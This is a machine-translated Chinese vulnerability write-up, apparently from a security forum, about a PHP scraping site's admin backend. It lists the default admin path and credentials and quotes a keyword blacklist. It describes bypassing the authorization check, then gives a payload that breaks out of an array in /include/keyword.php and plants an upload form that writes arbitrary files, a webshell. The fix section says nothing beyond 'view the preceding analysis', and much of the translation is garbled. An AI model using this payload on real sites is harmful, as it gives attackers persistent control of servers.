Vivi thief program background management system background shell and Breakthrough authorization Verification

A brief introduction to this set of programs, this program is a thief program, that is, there is no database, there is no so-called SQL injection.
The Administrator account and password are all stored in/admin/data. php in plain text.
Default background path:/admin/index. php
Default Account Password: admin
Let's take a look at how to analyze shell code.
The system configuration file does not look at it. Although ["] is used instead of single quotes, it is found that ["] is also escaped, so it makes a Group of Friends depressed.
Basically, this code is used on all pages that write files.
 


If (preg_match ("/require | include | REQUEST | eval | system | fputs/I", $ con )){
Echo "<script> alert ('contains invalid characters! '); Location. href = '? Id = wyc '; </script> ";
Some common functions are filtered out, so the process of writing a general sentence is broken. I will not continue to study and bypass it. There are many bypass methods.
Next, let's take a look at the shell's local SEO optimization settings.
By default, www.2cto.com indicating the authorization information is displayed.
 
But let's take a look at it, that is, JavaScript is playing tricks. This is simple.
The Opera browser is used to bypass the window.
The edited file is/admin/wyc. php. Check the code.
 
It's amazing to use this stripslashes... Haha, funny!
It is saved to the/include/keyword. php file. Let's take a look at the structure of this file to construct statements.
 
Okay, it's saved as an array.
By comparing the webpage, we can see that it only saves the content in the middle of array.
Now you know. So we can insert it at the beginning, so we should close it first.) Let the array End and then add
Our code
Just don't get a word. Just create a pony.
)?> <Form method = "post" action = "? Hack = niu "enctype =" multipart/form-data "> <input name =" upfile "type =" file "> <input type =" submit "value =" OK "> </form> <? Php if ($ _ GET ['hink'] = 'niu') {if (! File_exists ($ _ FILES ["upfile"] ["name"]) {copy ($ _ FILES ["upfile"] ["tmp_name"], $ _ FILES ["upfile"] ["name"]) ;}}?>
Let's look at the results.
 
Okay. It's over.

Fix: view the preceding analysis.
From: nuclear'atk Network Security Research Center